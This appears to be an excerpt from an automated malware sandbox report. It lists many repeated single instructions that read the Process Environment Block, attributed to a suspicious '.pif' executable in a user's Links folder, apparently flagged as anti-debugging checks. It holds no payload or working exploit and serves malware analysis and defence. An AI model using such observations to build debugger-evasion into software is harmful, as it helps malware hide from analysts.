Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDEB0 mov eax, dword ptr fs:[00000030h]	6_2_1BEFDEB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDEB0 mov eax, dword ptr fs:[00000030h]	6_2_1BEFDEB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDEB0 mov eax, dword ptr fs:[00000030h]	6_2_1BEFDEB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE83E8F mov eax, dword ptr fs:[00000030h]	6_2_1BE83E8F
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE57E96 mov eax, dword ptr fs:[00000030h]	6_2_1BE57E96
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDDE9B mov eax, dword ptr fs:[00000030h]	6_2_1BEDDE9B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4BE78 mov ecx, dword ptr fs:[00000030h]	6_2_1BE4BE78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE65E40 mov eax, dword ptr fs:[00000030h]	6_2_1BE65E40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0DE46 mov eax, dword ptr fs:[00000030h]	6_2_1BF0DE46
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BE51 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BE51
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BE51 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BE51
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF9E56 mov ecx, dword ptr fs:[00000030h]	6_2_1BEF9E56
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE6DE2D mov eax, dword ptr fs:[00000030h]	6_2_1BE6DE2D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE6DE2D mov eax, dword ptr fs:[00000030h]	6_2_1BE6DE2D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE6DE2D mov eax, dword ptr fs:[00000030h]	6_2_1BE6DE2D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE51E30 mov eax, dword ptr fs:[00000030h]	6_2_1BE51E30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE51E30 mov eax, dword ptr fs:[00000030h]	6_2_1BE51E30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4DE10 mov eax, dword ptr fs:[00000030h]	6_2_1BE4DE10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BE17 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BE17
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDDDC0 mov eax, dword ptr fs:[00000030h]	6_2_1BEDDDC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53DD0 mov eax, dword ptr fs:[00000030h]	6_2_1BE53DD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53DD0 mov eax, dword ptr fs:[00000030h]	6_2_1BE53DD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0DDC7 mov eax, dword ptr fs:[00000030h]	6_2_1BF0DDC7
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1DDC6 mov eax, dword ptr fs:[00000030h]	6_2_1BF1DDC6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE89DAF mov eax, dword ptr fs:[00000030h]	6_2_1BE89DAF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5FDA9 mov eax, dword ptr fs:[00000030h]	6_2_1BE5FDA9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5DA0 mov eax, dword ptr fs:[00000030h]	6_2_1BEE5DA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5DA0 mov eax, dword ptr fs:[00000030h]	6_2_1BEE5DA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5DA0 mov eax, dword ptr fs:[00000030h]	6_2_1BEE5DA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE5DA0 mov ecx, dword ptr fs:[00000030h]	6_2_1BEE5DA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE6DDB1 mov eax, dword ptr fs:[00000030h]	6_2_1BE6DDB1
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE6DDB1 mov eax, dword ptr fs:[00000030h]	6_2_1BE6DDB1
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE6DDB1 mov eax, dword ptr fs:[00000030h]	6_2_1BE6DDB1
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDDDB1 mov eax, dword ptr fs:[00000030h]	6_2_1BEDDDB1
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4FD80 mov eax, dword ptr fs:[00000030h]	6_2_1BE4FD80
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE49D96 mov eax, dword ptr fs:[00000030h]	6_2_1BE49D96
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE49D96 mov eax, dword ptr fs:[00000030h]	6_2_1BE49D96
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE49D96 mov ecx, dword ptr fs:[00000030h]	6_2_1BE49D96
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF09D70 mov eax, dword ptr fs:[00000030h]	6_2_1BF09D70
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF09D70 mov eax, dword ptr fs:[00000030h]	6_2_1BF09D70
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE57D75 mov eax, dword ptr fs:[00000030h]	6_2_1BE57D75
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE57D75 mov eax, dword ptr fs:[00000030h]	6_2_1BE57D75
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFD78 mov eax, dword ptr fs:[00000030h]	6_2_1BEFFD78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFD78 mov eax, dword ptr fs:[00000030h]	6_2_1BEFFD78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFD78 mov eax, dword ptr fs:[00000030h]	6_2_1BEFFD78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFD78 mov eax, dword ptr fs:[00000030h]	6_2_1BEFFD78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFD78 mov eax, dword ptr fs:[00000030h]	6_2_1BEFFD78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47D41 mov eax, dword ptr fs:[00000030h]	6_2_1BE47D41
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D40 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BD4E mov eax, dword ptr fs:[00000030h]	6_2_1BE8BD4E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BD4E mov eax, dword ptr fs:[00000030h]	6_2_1BE8BD4E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDDD47 mov eax, dword ptr fs:[00000030h]	6_2_1BEDDD47
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF11D5A mov eax, dword ptr fs:[00000030h]	6_2_1BF11D5A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF11D5A mov eax, dword ptr fs:[00000030h]	6_2_1BF11D5A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF11D5A mov eax, dword ptr fs:[00000030h]	6_2_1BF11D5A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF11D5A mov eax, dword ptr fs:[00000030h]	6_2_1BF11D5A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D20 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D20
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDFD2A mov eax, dword ptr fs:[00000030h]	6_2_1BEDFD2A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDFD2A mov eax, dword ptr fs:[00000030h]	6_2_1BEDFD2A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE63D00 mov eax, dword ptr fs:[00000030h]	6_2_1BE63D00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF1CF9 mov eax, dword ptr fs:[00000030h]	6_2_1BEF1CF9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF1CF9 mov eax, dword ptr fs:[00000030h]	6_2_1BEF1CF9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF1CF9 mov eax, dword ptr fs:[00000030h]	6_2_1BEF1CF9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61CC7 mov eax, dword ptr fs:[00000030h]	6_2_1BE61CC7
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61CC7 mov eax, dword ptr fs:[00000030h]	6_2_1BE61CC7
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE85CC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE85CC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE85CC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE85CC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFCDF mov eax, dword ptr fs:[00000030h]	6_2_1BEFFCDF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFCDF mov eax, dword ptr fs:[00000030h]	6_2_1BEFFCDF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFFCDF mov eax, dword ptr fs:[00000030h]	6_2_1BEFFCDF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47CD5 mov eax, dword ptr fs:[00000030h]	6_2_1BE47CD5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47CD5 mov eax, dword ptr fs:[00000030h]	6_2_1BE47CD5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47CD5 mov eax, dword ptr fs:[00000030h]	6_2_1BE47CD5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47CD5 mov eax, dword ptr fs:[00000030h]	6_2_1BE47CD5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47CD5 mov eax, dword ptr fs:[00000030h]	6_2_1BE47CD5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED3CDB mov eax, dword ptr fs:[00000030h]	6_2_1BED3CDB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED3CDB mov eax, dword ptr fs:[00000030h]	6_2_1BED3CDB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED3CDB mov eax, dword ptr fs:[00000030h]	6_2_1BED3CDB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4DCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE4DCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7FCA0 mov ecx, dword ptr fs:[00000030h]	6_2_1BE7FCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7FCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7FCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7FCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7FCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7FCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7FCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7FCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7FCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BCA0 mov ecx, dword ptr fs:[00000030h]	6_2_1BE8BCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BCA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BCA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FCAB mov eax, dword ptr fs:[00000030h]	6_2_1BF0FCAB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53C84 mov eax, dword ptr fs:[00000030h]	6_2_1BE53C84
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53C84 mov eax, dword ptr fs:[00000030h]	6_2_1BE53C84
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53C84 mov eax, dword ptr fs:[00000030h]	6_2_1BE53C84
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53C84 mov eax, dword ptr fs:[00000030h]	6_2_1BE53C84
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61C60 mov eax, dword ptr fs:[00000030h]	6_2_1BE61C60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE81C7C mov eax, dword ptr fs:[00000030h]	6_2_1BE81C7C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47C40 mov eax, dword ptr fs:[00000030h]	6_2_1BE47C40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47C40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE47C40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47C40 mov eax, dword ptr fs:[00000030h]	6_2_1BE47C40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47C40 mov eax, dword ptr fs:[00000030h]	6_2_1BE47C40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FC4F mov eax, dword ptr fs:[00000030h]	6_2_1BF0FC4F
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF21C3C mov eax, dword ptr fs:[00000030h]	6_2_1BF21C3C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BC3B mov esi, dword ptr fs:[00000030h]	6_2_1BE8BC3B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1DC27 mov eax, dword ptr fs:[00000030h]	6_2_1BF1DC27
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1DC27 mov eax, dword ptr fs:[00000030h]	6_2_1BF1DC27
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1DC27 mov eax, dword ptr fs:[00000030h]	6_2_1BF1DC27
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED9C32 mov eax, dword ptr fs:[00000030h]	6_2_1BED9C32
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF2BC01 mov eax, dword ptr fs:[00000030h]	6_2_1BF2BC01
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF2BC01 mov eax, dword ptr fs:[00000030h]	6_2_1BF2BC01
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDBC10 mov eax, dword ptr fs:[00000030h]	6_2_1BEDBC10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDBC10 mov eax, dword ptr fs:[00000030h]	6_2_1BEDBC10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDBC10 mov ecx, dword ptr fs:[00000030h]	6_2_1BEDBC10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF253FC mov eax, dword ptr fs:[00000030h]	6_2_1BF253FC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F3E6 mov eax, dword ptr fs:[00000030h]	6_2_1BF0F3E6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0B3D0 mov ecx, dword ptr fs:[00000030h]	6_2_1BF0B3D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE733A5 mov eax, dword ptr fs:[00000030h]	6_2_1BE733A5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE833A0 mov eax, dword ptr fs:[00000030h]	6_2_1BE833A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE833A0 mov eax, dword ptr fs:[00000030h]	6_2_1BE833A0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF13B9 mov eax, dword ptr fs:[00000030h]	6_2_1BEF13B9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF13B9 mov eax, dword ptr fs:[00000030h]	6_2_1BEF13B9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF13B9 mov eax, dword ptr fs:[00000030h]	6_2_1BEF13B9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF2539D mov eax, dword ptr fs:[00000030h]	6_2_1BF2539D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEA739A mov eax, dword ptr fs:[00000030h]	6_2_1BEA739A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEA739A mov eax, dword ptr fs:[00000030h]	6_2_1BEA739A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE57370 mov eax, dword ptr fs:[00000030h]	6_2_1BE57370
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE57370 mov eax, dword ptr fs:[00000030h]	6_2_1BE57370
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE57370 mov eax, dword ptr fs:[00000030h]	6_2_1BE57370
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F367 mov eax, dword ptr fs:[00000030h]	6_2_1BF0F367
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3370 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3370
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4D34C mov eax, dword ptr fs:[00000030h]	6_2_1BE4D34C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4D34C mov eax, dword ptr fs:[00000030h]	6_2_1BE4D34C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF25341 mov eax, dword ptr fs:[00000030h]	6_2_1BF25341
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE49353 mov eax, dword ptr fs:[00000030h]	6_2_1BE49353
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE49353 mov eax, dword ptr fs:[00000030h]	6_2_1BE49353
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7F32A mov eax, dword ptr fs:[00000030h]	6_2_1BE7F32A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47330 mov eax, dword ptr fs:[00000030h]	6_2_1BE47330
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1132D mov eax, dword ptr fs:[00000030h]	6_2_1BF1132D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1132D mov eax, dword ptr fs:[00000030h]	6_2_1BF1132D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED930B mov eax, dword ptr fs:[00000030h]	6_2_1BED930B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED930B mov eax, dword ptr fs:[00000030h]	6_2_1BED930B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED930B mov eax, dword ptr fs:[00000030h]	6_2_1BED930B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F2F8 mov eax, dword ptr fs:[00000030h]	6_2_1BF0F2F8
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF252E2 mov eax, dword ptr fs:[00000030h]	6_2_1BF252E2
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE492FF mov eax, dword ptr fs:[00000030h]	6_2_1BE492FF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF012ED mov eax, dword ptr fs:[00000030h]	6_2_1BF012ED
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFB2F0 mov eax, dword ptr fs:[00000030h]	6_2_1BEFB2F0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFB2F0 mov eax, dword ptr fs:[00000030h]	6_2_1BEFB2F0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE592C5 mov eax, dword ptr fs:[00000030h]	6_2_1BE592C5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE592C5 mov eax, dword ptr fs:[00000030h]	6_2_1BE592C5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B2C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B2C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7F2D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7F2D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7F2D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7F2D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4B2D3 mov eax, dword ptr fs:[00000030h]	6_2_1BE4B2D3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4B2D3 mov eax, dword ptr fs:[00000030h]	6_2_1BE4B2D3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4B2D3 mov eax, dword ptr fs:[00000030h]	6_2_1BE4B2D3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE652A0 mov eax, dword ptr fs:[00000030h]	6_2_1BE652A0
